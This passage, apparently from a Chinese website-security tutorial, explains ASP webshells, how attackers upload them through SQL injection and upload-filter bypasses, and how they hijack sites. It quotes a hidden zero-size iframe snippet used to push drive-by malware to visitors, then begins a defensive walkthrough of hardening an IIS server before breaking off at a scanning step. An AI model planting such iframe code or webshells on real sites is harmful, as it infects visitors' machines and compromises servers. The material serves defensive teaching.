我们先来看一下什么叫webshell。webshell是由一个由相应脚本语言编写的具有在线编辑、删除、新增文件、执行程序及sql语句等功能的脚本文件,如老兵助手asp木马,海阳顶端asp木马就是这样的文件。黑客通常通过站点的sql注入漏洞进入管理员的后台,再通过后台上传过滤不严漏洞进行直接上传asp木马,或通过改扩展名或抓包欺骗等手段进行asp木马上传,或通过改变asp木马扩展名为图片扩展名后再进行,上传后通过数据库备分获得asp木马。那么上传后的木马会对我们的服务器或网站的文件造成什么样的影响呢?我们来看下图就知道了
上面是海洋顶端asp木马,下面是老兵助手asp木马:
木马可以执行文件的打开、编辑、复制、上传、下载等文件常用的操作命令,甚至可以执行net user 、netstat –an、dir 等guest用户命令,有数据库的连接操作,这些都危害到了我们服务器或网站的安全。可以说完全可以当作自己的机器来操作,当然不要说网站权限的编辑了,通过各种提权的方式可以达到拿下整台服务器的权限。
那么黑客们主要利用我们的网站或服务器来干什么呢?现阶段网络上最流行的就是拿下虚拟主机的权限在服务器上的网站里进行挂马,网站挂马主要是把网页木马挂在网站上,现在比较精典的挂马代码是:<iframe. src=“网马地址”。name="zhu" width="0" height="0" frameborder="0">,这段代码比较短,通常他们将这段代码加在被入侵服务器的主页里,当用户打开被挂马的网站时就会悄悄地打开另一个代码中的“网马地址”并执行“网马地址”中的一个exe文件,从而使用户的机器感染木马,被挂马者所控制,那么挂马者控制我们的机器来干什么呢?这将在后面的“个人pc机安全”中进行介绍。
从挂马代码我们可以看出,其实就是转而执行了一个隐藏的框架,但带来的危害却是不可预料的。那么我们要怎么来预防这一切呢?
首先是对服务器进行安全设置:现在asp站点一般都是基于iis环境搭建的,很多站点都是放在一个虚拟机上的,服务器的安全设置就得靠空间商的责任心和安全意识了,现在我在本机搭建一个windows2003+iis+mssql+serv-u的环境。服务器的设置主要防范非法用户的asp木马权限和通过asp木马进行提权的防范,当然,网站的注入点就得靠网站管理人员进行防范了。我在网上下载了一个整站程序:xxx商务网站,并在本地搭建测试完毕,下面来演示一下整个注入漏洞带来的危害以及我们对服务器的安全设置和对整站程序进行防注入的操作:
搭建情况如下图:
然后我们对站点进行sql注入漏洞检测。用工具扫描一下看,结果如下图:
